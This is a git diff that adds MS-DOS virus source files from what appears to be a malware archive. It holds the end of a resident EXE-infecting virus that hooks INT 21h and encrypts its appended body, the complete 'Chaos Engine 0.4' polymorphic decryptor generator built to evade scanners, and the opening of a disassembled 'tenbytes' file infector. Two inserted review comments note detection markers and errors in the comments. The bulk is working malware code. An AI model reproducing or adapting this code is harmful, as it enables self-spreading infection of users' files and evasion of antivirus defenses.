call ReturnFar + xor ax,ax + mov ds,ax + cli + mov ax,offset DebugWatch + xchg ax,ds:[20h] + mov cs:OldInt8o,ax + mov ax,cs + xchg ax,ds:[22h] + mov cs:OldInt8s,ax + sti + push ds:[4] + push ds:[6] + mov word ptr ds:[4],offset Trace1 + mov word ptr ds:[6],cs + pushf + push cs + mov ax,offset Return4 + push ax + cli + pushf + pop ax + or ax,100h + push ax + push ds:[86h] + push ds:[84h] + mov ah,52h +Trace1: push bp + mov bp,sp + push ax + push ds + push cs + pop ds + mov ax,FirstMCB + cmp [bp+4],ax + jae Return1 + mov ax,[bp-2] + mov RegAX,ax + mov RegSP,bp + mov ax,[bp+2] + mov OldInt21o,ax + mov ax,[bp+4] + mov OldInt21s,ax + xor ax,ax + mov ds,ax + mov word ptr ds:[4],offset Trace2 + mov word ptr ds:[6],cs + jmp short Trace3 +Return1: jmp short Return3 +Trace2: push bp + mov bp,sp + push ax + push ds + cmp ax,cs:RegAX + jne Return3 + cmp bp,cs:RegSP + jne Return3 +Trace3: push bx + push dx + lds bx,[bp+2] + mov al,[bx] + mov dx,[bx+1] + inc dx + cmp al,0e9h + je JumpOpcode + cmp al,0e8h + je CallOpcode + xchg ax,dx + dec ax + cbw + xchg ax,dx + cmp al,0ebh + je JumpOpcode + cmp al,70h + jb Return2 + cmp al,7fh + ja Return2 +JumpOpcode: push ax + push ds + xor ax,ax + mov ds,ax + mov word ptr ds:[0c8h],offset HackJump + mov word ptr ds:[0cah],cs + jmp short Continue +CallOpcode: push ax + push ds + xor ax,ax + mov ds,ax + mov word ptr ds:[0c8h],offset HackCall + mov word ptr ds:[0cah],cs +Continue: pop ds + pop ax + mov cs:Displacement,dx + mov cs:Opcode,al + mov ax,32cdh + xchg ax,[bx] + mov cs:SavedCode,ax + mov cs:HackOffset,bx + mov cs:HackSegment,ds + and word ptr [bp+6],0feffh +Return2: pop dx + pop bx +Return3: pop ds + pop ax + pop bp + iret +Return4: pop ds:[6] + pop ds:[4] + mov cs:Handle,0 +Exit: pop es + pop ds + mov ax,ds + add ax,10h + add cs:OldCS,ax + add ax,cs:OldSP + mov dx,cs:OldSP + cli + mov ss,ax + mov sp,dx + sti + jmp cs:OldEntry + +ReturnFar: retf + +OldEntry equ this dword +OldIP dw 0 +OldCS dw -10h +OldSP dw 1000h +OldSS dw 0 + 
+HackAddress equ this dword +HackOffset dw ? +HackSegment dw ? +SavedCode dw ? + +HackJump: call Interrupt21 + push bp ; simulate a conditional or + push ax ; unconditional jump + mov bp,sp + mov ax,[bp+8] + and ax,0fcffh + push ax + db 0b8h ; mov ax,???? +Displacement dw 0 + popf +Opcode db 0ebh,3,0 ; j?? +3 + xor ax,ax + nop + add [bp+4],ax + pop ax + pop bp + iret + +HackCall: call Interrupt21 + sub sp,2 ; simulate a call + push bp + mov bp,sp + push ax + mov ax,[bp+4] + inc ax + xchg ax,[bp+8] + xchg ax,[bp+6] + xchg ax,[bp+4] + add ax,cs:Displacement + mov [bp+2],ax + pop ax + pop bp + iret + +Seek: mov ah,42h + xor cx,cx + xor dx,dx + +Dos: pushf + db 9ah +OldInt21o dw ? +OldInt21s dw ? + ret + +DosVersion: cmp ax,3031h + jne NotTByte + cmp bx,0DEADh + jne NotTByte + mov ax,0DEADh + add sp,8 + iret + +Interrupt21: cmp ah,30h + je DosVersion + push si + push ds + push cs:SavedCode + lds si,cs:HackAddress + pop ds:[si] + pop ds + pop si + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + cmp ah,3eh + je CloseFile + cmp ah,40h + je WriteFile +Old21: pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + push si + push ds + lds si,cs:HackAddress + mov word ptr ds:[si],32cdh + pop ds + pop si +NotTByte: ret + +WriteFile: mov ax,4400h + call Dos + cmp dl,7fh + ja Error1 + mov al,1 + call Seek + jc Error1 + or dx,dx + jnz Error1 + cmp ax,17h + ja Error1 + push cs + pop es + mov si,dx + mov di,offset Signature + add di,ax + cmp word ptr [si],"ZM" + jne Error1 + cmp word ptr [si+12h],0DEADh + je Error1 + cmp cx,18h + jb CheckHandle + or ax,ax + jz Ok +CheckHandle: cmp bx,cs:Handle + jne Error1 +Ok: add cx,ax + cmp cx,18h + jbe CountOk + mov cx,18h +CountOk: sub cx,ax + jbe Error1 + cld + rep movsb + mov cs:Handle,bx +Error1: jmp Old21 + +CloseFile: push cs + pop ds + push cs + pop es + mov ax,4400h + call Dos + test dl,80h + jne Error1 + or bx,bx + je Read + cmp cs:Handle,bx + je DoNotRead +Read: xor 
al,al + call Seek + jc Error1 + mov ah,3fh + mov cx,18h + mov dx,offset Signature + call Dos + jc Error1 +DoNotRead: mov cs:Handle,0 + cmp Signature,"ZM" + jne Error1 + cmp ChkSum,0DEADh + je Error1 + mov ax,ExeIP + mov OldIP,ax + mov ax,ExeCS + mov OldCS,ax + mov ax,ExeSS + mov OldSS,ax + mov ax,ExeSP + mov OldSP,ax + mov al,2 + call Seek + jc Error1 + push ax + push dx + mov cx,200h + div cx + cmp PartPage,dx + jne SizeError + add dx,-1 + adc ax,0 + cmp PageCount,ax +SizeError: pop dx + pop ax + jne Error2 + add ax,0fh + adc dx,0 + and ax,0fff0h + mov cx,dx + mov dx,ax + mov ax,4200h + call Dos + jnc SeekOk +Error2: jmp Old21 +SeekOk: mov cx,10h + div cx + sub ax,HdrSize + mov ExeCS,ax + mov ExeIP,offset Decrypt1 + mov ExeSS,ax + mov ExeSP,VirusSize1+400h + cmp MinMem,40h + jae MemoryOk + mov MinMem,40h + cmp MaxMem,40h + jae MemoryOk + mov MaxMem,40h +MemoryOk: push ds + push es + mov ax,cs + mov ds,ax + add ax,(VirusSize2+0fh)/10h + mov es,ax + mov cx,VirusSize1 + xor si,si + xor di,di + cld + rep movsb + mov ds,ax + mov cx,offset StartEncrypt-Decrypt2 + mov dl,byte ptr ds:Decrypt1[6] + mov si,offset StartEncrypt-1 +Again1: xor ds:[si],dl + dec si + loop Again1 + mov cx,(VirusEnd1-StartEncrypt+1)/2 + mov dh,dl + mov si,offset StartEncrypt +Again2: xor ds:[si],dx + mov ax,ds:[si] + add dx,ax + inc si + add dx,ax + inc si + loop Again2 + mov ah,40h + mov cx,VirusSize1 + xor dx,dx + call Dos + pop ds + pop es + jc Error3 + mov al,2 + call Seek + jc Error3 + mov cx,200h + div cx + mov PartPage,dx + add dx,-1 + adc ax,0 + mov PageCount,ax + mov ChkSum,0DEADh + xor al,al + call Seek + jc Error3 + mov ah,40h + mov cx,18h + mov dx,offset Signature + call Dos +Error3: jmp Old21 + +Count dw 8 +DebugStr db 'DEBUG' +CommandStr db 'COMMAND ' + +DebugWatch: push ax + push cx + push dx + push si + push di + push ds + push es + dec cs:Count + jnz EndWatch + mov cs:Count,8 + mov ax,0b000h + mov ds,ax + mov cx,2 + push cs + pop es + cld +NextScreen: push cx + mov cx,2000 + xor 
si,si + mov di,offset DebugStr +NextChar1: mov dx,5 +NextChar2: lodsb + inc si + and al,0dfh + scasb + jne CharOk + dec dx + jnz NextChar2 +Alarm: pop cx + lds si,cs:HackAddress + cmp byte ptr ds:[si],0cdh + jne EndWatch + mov ax,cs:SavedCode + mov ds:[si],ax + xor cx,cx + mov ds,cx + mov ax,cs:OldInt8o + mov ds:[20h],ax + mov ax,cs:OldInt8s + mov ds:[22h],ax + mov es,cx + push cs + pop ds + mov cx,14 + mov si,offset EndWatch-2 + mov di,4f0h + push es + push di + rep movsb + xor di,di + mov cx,VirusSize2 + push cs + pop es + retf +CharOk: neg dx + add dx,5 + sbb di,dx + sub si,dx + sub si,dx + loop NextChar1 +ScreenOk: mov ax,ds + add ax,800h + mov ds,ax + pop cx + loop NextScreen + jmp short EndWatch + rep stosb +EndWatch: pop es + pop ds + pop di + pop si + pop dx + pop cx + pop ax + db 0eah +OldInt8o dw ? +OldInt8s dw ? + + db '***** (C) COPYRIGHT 1992 BY THE WRITER *****' + +VirusEnd1 equ $ + +FirstMCB dw ? +RegAX dw ? +RegSP dw ? + +Handle dw ? +Signature dw ? +PartPage dw ? +PageCount dw ? +ReloCnt dw ? +HdrSize dw ? +MinMem dw ? +MaxMem dw ? +ExeSS dw ? +ExeSP dw ? +ChkSum dw ? +ExeIP dw ? +ExeCS dw ? + +VirusEnd2 equ $ + +virus ends + +end Main + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.tce.asm b/MSDOS/Virus.MSDOS.Unknown.tce.asm new file mode 100644 index 00000000..ac7cf84e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tce.asm 
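Review bot: The `mov ax,03031h` / `mov bx,0DEADh` / `int 21h` / `cmp ax,0DEADh` sequence at Main is the resident-copy probe answered by `DosVersion`, which returns 0DEADh in AX only when both values match, and neither side carries a comment; `; resident? probe, answered by DosVersion below` at Main and `; self-recognition: AX=3031h/BX=0DEADh -> AX=0DEADh` at DosVersion would let an analyst see the handshake without tracing the interrupt chain. From a detection standpoint that hooked-INT 21h reply and the 0DEADh word stored in the EXE header checksum field (`mov ChkSum,0DEADh`, checked again by `cmp word ptr [si+12h],0DEADh` in WriteFile) are the fixed recognition values in this file, and documenting them as such is more useful than the bare `TBSCAN.DAT` line in the header, which does not say which bytes it refers to.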
@@ -0,0 +1,862 @@ + radix 16 + +;***************************************** +;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 * +;***************************************** +;1995 - Sepultura - Australia +;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;on CALLing of TCE - +;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH. +;;; 2 - Make Short Decryptor (No Junk). +;;; 4 - Add Segment Overide. +;;; +;;;CX = Length of Code to Encrypt. +;;;DX = Delta Offset. +;;;DS:SI = Code to encrypt (DS _MUST_ = CS). +;;;ES:DI = Location of Buffer to Create Decryptor in. +;;; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;ON RETURN: +;;;ES = DS = Segment of Decryptor / Encrypted Code +;;;DX = Pointer to Start of Code +;;;CX = Length of Code +;;;;;;;;;;;;;;;;;;; +;;;Flag EQUates + +MAKE_SMALL equ 1 +PAD_TO_MAX equ 2 +ADD_SEG equ 4 + +;;;;;;;;;;;;;;;;;;; +;;;W.H.A.T.E.V.E.R + +DECRYPTOR_LENGTH equ 190h +MAX_PADDING equ 90h - 1f +length_1 equ (offset int_tbl - offset one_byters)-1 + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;REGISTER TABLE - INTEL STANDLE FORMAT + +tce_AX equ 0000xB +tce_CX equ 0001xB +tce_DX equ 0010xB +tce_BX equ 0011xB +tce_SP equ 0100xB +tce_BP equ 0101xB +tce_SI equ 0110xB +tce_DI equ 0111xB + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;;;THe BeLoW InSTuCTiOn CaN KilL A MaN + +db '[TCE-0.4]',0 + +;***************************************************** +;***************************************************** +;*** The REAL _REAL_ START of THE CHAOS ENGINE 0.4 *** +;***************************************************** +;***************************************************** + +tce: push ax,bx,bp + push di,si + + cld + + mov tce_begin,di + mov tce_delta,dx + mov c_length,cx + mov tce_flags,ax + call clear_regs + mov B index_sub,0 + + mov B[offset more_junk],0b0 + test W tce_flags,MAKE_SMALL + if nz mov B[offset more_junk],0c3 + + push si + call get_rand_1f + add ax,MAX_PADDING + xchg cx,ax + call more_junk + 
+swap0: mov si,offset init_1 + lodsw + call binary + jz no_swap1 + xchg ax,[si] + mov [si-2],ax + +no_swap1: + push ax + lodsw + call binary + jnz no_swap2 + xchg ax,[si] + mov [si-2],ax + +no_swap2: + push ax + lodsw + lodsw + call binary + jz build_code + xchg ax,[si] + mov [si-2],ax + +build_code: + pop ax + call ax + call pad_10 + pop ax + call ax + call pad_10 + call W init_3 + call pad_10 + call gen_decrypt + call pad_8 + call W init_4 + call pad_8 + call W init_5 + call pad_10 + call gen_loop + call pad_8 + + test W tce_flags,PAD_TO_MAX + jz no_padding + + mov B[offset more_junk],0b0 + mov cx,DECRYPTOR_LENGTH + add cx,tce_begin + sub cx,di + call more_junk + +no_padding: + mov ax,di + sub ax,DECRYPTOR_LENGTH + add enc_index,ax + mov bx,W index_loc + cmp B index_sub,1 + if e neg ax + add es:[bx],ax + + pop si + mov cx,c_length + rep movsb + mov dx,tce_begin + mov ds,es + call encryptor + mov cx,di + sub cx,dx + + pop si,di + pop bp,bx,ax + ret + +init_count: ;Initialises Count Register.. + call get_unused_reg ;Make Count Initialiser in Encryptor and + cmp al,tce_DX + je init_count + mov count_reg,al ;Decryptor + mov bx,W c_length + shr bx,1 + mov W enc_length,bx + call gen_mov_reg + ret + +init_index: ;Initialises Index Register.. + mov ax,0ff ;Makes Index Initialiser in Encryptor and + call get_rand ;Decryptor.. 
+ push ax + call get_rand_7 + pop ax + if z xor ax,ax + mov B index_off,al + mov bx,DECRYPTOR_LENGTH + add bx, tce_begin + mov W enc_index,bx + add bx, tce_delta + cbw + sub bx,ax + +get_index: + call get_unused_reg + cmp al,tce_BX + jb get_index + mov W index_num,ax + mov B index_reg,al + mov B index_set,1 + call gen_mov_reg + mov B index_set,0 + ret + +gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction + mov W loop_start,di + call pad_8 + mov bl,B key_reg + sal bl,3 + call get_rand_2 + add ax,ax + add ax,offset enc_table + xchg si,ax + lodsw + call binary + if z xchg ah,al + push ax + cmp si,offset enc_table + 2 + jne no_carry_set + mov al,0f8 + call binary + if z inc ax + mov B enc_cf,al + stosb + +no_carry_set: + test W tce_flags,ADD_SEG + jz no_seg_set + mov al,2e + stosb + +no_seg_set: + pop ax + stosb + mov B enc_loop,ah + mov si,W index_num + + cmp B index_reg,tce_BP + je encryptor_has_offset + cmp B index_off,0 + jne encryptor_has_offset + push ax + call get_rand_7 + pop ax + jz encryptor_has_offset + add si,index_tab_c + lodsb + or al,bl + stosb + ret + +encryptor_has_offset: + add si,index_tab_b + lodsb + or al,bl + mov ah,B index_off + or al,bl + stosw + xchg al,ah + cbw + call binary + jnz ret + mov al,ah + stosb + add es:B[di-3],40 + ret + +modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx + call get_rand_7 + jz no_mod_key + call get_rand_2 + add ax,offset modify_table + xchg si,ax + lodsb + mov ah,al + mov al,81 + mov W enc_mod_op,ax + or ah,B key_reg + stosw + call get_any_rand + stosw + +no_mod_key: + mov W enc_mod_val,ax + + ret + +inc_index: ;increase index by 2.. 
+ call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2 + jz add_sub_index + + mov al,B index_reg + or al,40 + stosb + call pad_8 + stosb + ret + +add_sub_index: + mov al,83 + stosb + mov ah,2 + mov al,B index_reg + or al,0c0 + + call binary + jnz put_add_sub_index + + neg ah + or al,0e8 + +put_add_sub_index: + stosw + ret + +gen_loop: + mov al,B count_reg + cmp al,tce_CX + jne not_CX + + push ax + call get_rand_7 + pop ax + jz not_CX + + lea bx,[di+2] + mov ax,W loop_start + sub ax,bx + mov ah,0e2 + call binary + jnz no_loop_nz + xchg bp,ax + jmp short do_loop_nz + +no_loop_nz: + xchg ah,al + stosw + ret + +not_CX: xchg bx,ax + + call binary + jz count_add_sub + + mov al,48 + or al,bl + stosb + jmp short zero_test + + +count_add_sub: + mov al,83 + stosb + mov ah,-1 + mov al,bl + or al,0c0 + + call binary + jnz put_add_sub_count + + neg ah + or al,0e8 + +put_add_sub_count: + stosw + xor bp,bp + push ax + call get_rand_7 + pop ax + jz nloop_nz + +zero_test: + call pad_10 + xor bp,bp +do_loop_nz: + mov al,B count_reg + mov bl,al + sal al,3 + or al,bl + xchg ah,al + mov bh,ah + call get_rand_2 + add ax,offset zero_test_a + xchg si,ax + lodsb + mov ah,bh + or ah,0c0 + stosw + +nloop_nz: + lea bx,[di+2] + mov ax,W loop_start + sub ax,bx + or bp,bp + jnz loop_nz + mov ah,075 + call binary + jnz nnnn + mov B es:[di],0f8 + inc di + sub ax,0fe01 + db 0a9 + +loop_nz:mov ah,0e0 + + +nnnn: xchg ah,al + stosw + ret + +init_key: + call get_any_rand + mov W enc_key,ax + xchg bx,ax + call get_unused_reg + mov B key_reg,al + +gen_mov_reg: + call binary + jz lea_mov + + or al,0b8 + stosb + xchg ax,bx + jmp short put_mov_b + +lea_mov:call binary + jz zero_then_add + + sal al,3 + or al,06 + mov ah,8d + xchg ah,al + stosw + xchg ax,bx + jmp short put_mov_b + +zero_then_add: ;Zero Register (XOR/SUB reg,reg) + push bx ;Then OR/XOR/ADD Value + push ax ;or SUB -Value + mov ah,0c0 + or ah,al + sal al,3 + or ah,al + mov al,29 + call binary + if z mov al,31 + stosw + call pad_10 + pop bx + call 
get_rand_2 + add ax,offset value_from_0 + xchg si,ax + lodsb + call binary + jz zero_then_sub + + or al,bl + mov ah,81 + xchg ah,al + stosw + pop ax + +put_mov_b: + cmp B index_set,01 + if e mov W index_loc,di + stosw + ret + +zero_then_sub: + cmp B index_set,01 + if e mov B index_sub,1 + mov al,0e8 + or al,bl + mov ah,81 + xchg ah,al + stosw + pop ax + neg ax + jmp short put_mov_b + +pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes + call get_rand_7 + inc ax + jmp short padder + +pad_10: push ax + call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes + or al,8 +padder: xchg cx,ax + call more_junk + pop ax + ret + + +more_junk: + mov al,03 + call get_rand_b + jnz mj0 + + mov B [offset code_jmp],083 ;Re-Enable Jumps + mov ax,cx ;else normal filler junk (1 in 16) + cmp ax,40 + if a mov al,40 + call get_rand_b + xchg bx,ax + call fill_jnk + jmp short mj2 + +mj0: ;8 in 16 chance of some type of jump + call code_jmp + + +mj2: jcxz ret + jmp short more_junk + + +one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION + jcxz ret + mov si,one_byters ;FROM one_byters TABLE + mov al,length_1 + call get_rand_b + add si,ax + movsb + dec cx + dec bx + ret + +reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16.. 
+ sal al,3 + or al,3 + xchg dx,ax + call get_unused_reg + sal al,3 + mov dh,al + call get_rand_7 +do_op: or dh,al + or dh,0c0 + xchg dx,ax +put_2: cmp bx,2 + jb one_byte + stosw + dec cx,2 + dec bx,2 + ret + + +lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI] + cmp al,6 + je lea_reg + + xchg dx,ax + call get_unused_reg + sal al,3 + or al,dl + mov ah,08d + xchg ah,al + + jmp short put_2 + +op_ax: call get_any_rand + and al,8 + or al,5 + and ah,3 + shr ah,4 + or al,ah + +put_3: cmp bx,3 + jb reg_op + stosb + call get_any_rand +put_3b: stosw + sub cx,3 + sub bx,3 + ret + +mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx + or al,0b8 + jmp short put_3 + + +op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16 + cmp bx,4 + jb op_ax + call get_unused_reg + mov ah,81 + xchg dx,ax + call get_rand_7 + sal al,3 + or ax,dx + xchg ah,al + or ah,0c0 + stosw + call get_any_rand + stosw + sub bx,4 + sub cx,4 + ret + + +code_jmp: + cmp cx,3 + jb ret + + mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained + ;(TBAV-J) and helps stops heuristics + call get_any_rand ;else conditional jmp + and ax,1f0f ;between 4 and 43 bytse jmp length + add ah,4 + or al,70 ;conditional jmp instructions are 70 + ;--> 7f + push ax + call get_rand_1f + pop ax + if z mov al,0e3 + xor bx,bx + mov bl,ah + + dec cx,2 + cmp bx,cx + jb put_jmp + mov bx,cx + mov ah,bl + +put_jmp:stosw + +fill_jnk: + or bx,bx + jz ret + + mov al,((offset binary - offset junk_tbl)/2)-1 + call get_rand_b + add ax,ax + add ax,offset junk_tbl + xchg si,ax + lodsw + call ax + jmp short fill_jnk + + +pp_reg: ;generate PUSH reg / junk / POP reg + cmp bx,3 + jb gen_int + + lea ax,[bx-2] + shr ax,1 + call get_rand + xchg ax,dx + call get_rand_7 + or al,50 + stosb + dec cx + dec bx + push ax + xchg dx,ax + sub bx,ax + push bx + xchg bx,ax + call fill_jnk + pop bx + pop ax + + call binary + jz use_same + call get_unused_reg + or al,50 + +use_same: + or al,8 + stosb + dec cx + dec bx + ret + + +gen_int:cmp bx,4 + jb 
ret + + call get_rand_2 + + add ax,ax + add ax,offset int_tbl + xchg si,ax + lodsw + mov dx,0cdb4 + xchg al,dl + stosw + xchg dx,ax + xchg ah,al + stosw + sub cx,4 + sub bx,4 + ret + +junk_tbl: dw offset op_reg_im + dw offset op_reg_im + dw offset op_reg_im + dw offset gen_int + dw offset gen_int + dw offset pp_reg + dw offset pp_reg + dw offset reg_op + dw offset reg_op + dw offset lea_reg + dw offset lea_reg + dw offset mov_reg + dw offset op_ax + dw offset one_byte + +binary: push ax + mov al,1 + call get_rand_b + pop ax + ret + +get_rand_2: + mov al,2 + db 0a9 + +get_rand_7: + mov al,7 + db 0a9 + +get_rand_1f: + mov al,1f + db 0a9 + +get_any_rand: ;return rnd number in AX between 0 and FFFE + mov al,0fe + +get_rand_b: + cbw + +get_rand: ;returns random number in AX between 0 and AX + push cx,dx + inc ax + push ax + in ax,40 + xchg cx,ax + in ax,40 + rol ax,cl + xchg cx,ax + in ax,40 + xor ax,cx + adc ax,1234 + org $-2 +last_rand dw 0AAAA + mov last_rand,ax + pop cx + xor dx,dx + cmp cx,1 + adc cx,0 + div cx + xchg dx,ax + or ax,ax + pop dx,cx + ret + +one_byters: cmc ;15 1 byte junk instructions + cld + std + in ax,dx + in al,dx + lahf + cbw + nop + aaa + aas + daa + das + inc ax + dec ax + xlat + + +int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer.. + dw 0216 ;AH=02,INT16: Get Keyboard States.. + dw 4d21 ;AH=4D,INT21: Get Program Terminate Status.. + dw 4d21 ;AH=4D,INT21: Get Program Terminate Status.. + dw 0d10 ;AH=0D,INT10: Get Video Info.. + dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer.. + dw 002a + dw 002a + + +clear_regs: cwd + mov B index_reg,dl ;Clears Register Tables + mov B key_reg,dl ;(All Regs Free).. + mov B count_reg,dl + ret + +get_unused_reg: call get_rand_7 ;Return an Unused Register.. + test al,NOT tce_SP ;But _NOT_ SP, or AX. 
+ jz get_unused_reg + cmp al,index_reg + je get_unused_reg + cmp al,count_reg + je get_unused_reg + cmp al,B key_reg + je get_unused_reg + ret + + +;********************************************** +;* The Encryptor (Built along with Decryptor) * +;********************************************** +encryptor: mov cx,1234 + org $-2 +enc_length dw 0 + + mov bx,1234 + org $-2 +enc_index dw 0 + + mov ax,1234 + org $-2 +enc_key dw 0 + +enc_cf: nop +enc_loop: xor [bx],ax + +enc_mod_op dw 0 +enc_mod_val dw 0 + + inc bx,2 + loop enc_cf + ret + +;**************************** +;* Data / Variables / Flags * +;**************************** + +init_1 dw offset init_count +init_2 dw offset init_key +init_3 dw offset init_index + +init_4 dw offset inc_index +init_5 dw offset modify_key + +;* The Below is A table of Values to Be Used To Choose * +;* The Count Register, The Index Register, and The Reg * +;* to save SP in During the Decryptor Loop * +; BX BP SI DI ;This Table is used To Build +index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction +index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above +; SBB ADC XOR XOR ADD SUB +enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes.. + +; AND OR TEST +zero_test_a: db 21, 09,85 + +; SUB ;Opcodes to Modify the Key +modify_table: db 0e8 ;Register +; ADD XOR OR ;Opcode to get A value +value_from_0: db 0c0,0f0,0c8 ;from 0. + +loop_start dw 0 ;Postion for LOOP to Jump to.. + +index_num dw 0 +index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]). +index_loc dw 0 ;location in ES of index reference set +index_sub db 0 ;Was index_reg set using 0 the sub -value? + +index_reg db 0 ;Table of Used Registers.. +count_reg db 0 ;used in GET_UNUSED_REG +key_reg db 0 +index_set db 0 + +tce_flags dw 0 ;Engines Flags +tce_delta dw 0 ;Delta Offset +tce_begin dw 0 ;Beginning +c_length dw 0 +end_tce: + diff --git a/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm b/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm new file mode 100644 index 00000000..4f16859d --- /dev/null 
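Review bot: The header's flag table and the equates disagree: the comment lists `1 - Pad To DECRYPTOR_LENGTH` and `2 - Make Short Decryptor (No Junk)`, while the code defines `MAKE_SMALL equ 1` and `PAD_TO_MAX equ 2` and tests the equates (`test W tce_flags,MAKE_SMALL`), so the comment is the wrong side; the header lines should read `1 - Make Short Decryptor (No Junk)` and `2 - Pad To DECRYPTOR_LENGTH`. Likewise `pad_10` is commented "Pad Between 8 and 16 bytes" but `get_rand_1f` followed by `or al,8` yields a value from 8 to 31. Both matter to anyone reading this listing to characterise what output of the engine looks like.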
+++ b/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm 
@@ -0,0 +1,826 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +start: mov ax,es ;0100 8C C0 + add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E + jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C + +d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138 + + ;<- duplicated code (aligning to 20h bytes) + db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41 + db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B + +;.............................................................. +; victim code +;.............................................................. + org 1380h + + +;============================================================================ +; Segment aligned virus segment begin +;---------------------------------------------------------------------------- + +;================================================================ +; COM virus Entry +; (this code is present only in case *.COM infection) +;---------------------------------------------------------------- +l_0000: push ds ;1380 1E + push cs ;1381 0E + pop ds ;1382 1F + lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7 + mov di,100h ;1387.BF 0100 + mov cx,20h ;138A B9 0020 + rep movsb ;restore victim bytes ;138D F3/ A4 + + mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF + nop ;1395 90 + pop ds ;1396 1F + lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F + jmp ax ;139B FF E0 + + ;<--- duplicated fields d_033F - d_0347 + dw 0020 ;139D 20 00 + dw 05EAh ;139F EA 05 + dw 0Bh ;13A1 0B 00 + dw 28h ;13A3 28 00 + dw 200h ;13A5 00 02 + db 0 ;13A7 00 + +;=========================================================================== +; Begin of file type independent virus code +;--------------------------------------------------------------------------- + +;================================================================ +; Get/Set victim attribute 
+;---------------------------------------------------------------- +s_13A8 proc near + mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F + mov ah,43h ;get/set file attrb ;13AB B4 43 + int 21h ;13AD CD 21 + retn ;13AF C3 +s_13A8 endp + +;================================================================ +; Move file ptr to EOF +;---------------------------------------------------------------- +s_13B0 proc near + xor cx,cx ;13B0 33 C9 + xor dx,dx ;13B2 33 D2 + mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202 + mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B + int 21h ;13BC CD 21 + retn ;13BE C3 +s_13B0 endp + + +;================================================================ +; Read 32 bytes into buffer +;---------------------------------------------------------------- +s_13BF proc near + mov cx,20h ;13BF B9 0020 + mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7 + mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B + mov ah,3Fh ;read file ;13CA B4 3F + int 21h ;13CC CD 21 + mov cx,ax ;bytes read ;13CE 8B C8 + retn ;13D0 C3 +s_13BF endp + +;================================================================ +; Write 32 B into file +;---------------------------------------------------------------- +s_13D1 proc near + mov ax,8 ;switch off destruction ;13D1 B8 0008 + mov es,ax ;13D4 8E C0 + mov cx,20h ;13D6 B9 0020 + mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7 + mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B + mov ah,40h ;write file cx=bytes ;13E1 B4 40 + int 21h ;13E3 CD 21 + mov cx,ax ;13E5 8B C8 + retn ;13E7 C3 +s_13D1 endp + +;================================================================ +; Calculate virus length +;---------------------------------------------------------------- +s_13E8 proc near + mov ax,612h ;virus code length ;13E8 B8 0612 + mov dx,28h ;file type depended code;13EB BA 0028 + sub ax,dx ;13EE 2B C2 + mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341 + retn ;13F3 C3 +s_13E8 endp + 
